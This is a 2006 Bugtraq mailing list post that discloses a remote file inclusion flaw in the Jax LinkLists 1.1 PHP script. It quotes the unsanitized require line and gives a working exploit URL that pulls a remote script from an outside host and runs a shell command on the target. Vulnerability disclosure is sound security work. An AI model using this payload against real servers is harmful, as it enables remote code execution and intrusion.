Bugtraq mailing list archives
Jax LinkLists Remote File include
From: dj_remix_20 () hotmail com
Date: 13 Oct 2006 01:01:31 -0000
# BiyoSecurity.Org & SecurityWall.Org # Download : http://www.jtr.de/scripting/php/linklists/linklists%20v1.1.zip # Script Name : Jax LinkLists # Version : 1.1 # Risk : high # Regard : RMx # Thanx : Liz0zim , KorsaN , DreamLord , TR_IP # Vulnerable Files : /admin/linklists.admin.php # Vulnerable code : // global variables require ( $pathtoscript."globals.inc.php"); # Exploit : http://www.victim.com/[PATH]/admin/linklists.admin.php?pathtoscript=http://site.com/cmd.gif?&cmd=ls
Current thread:
- Jax LinkLists Remote File include dj_remix_20 (Oct 13)
- <Possible follow-ups>
- Re: Jax LinkLists Remote File include xorontr (Oct 14)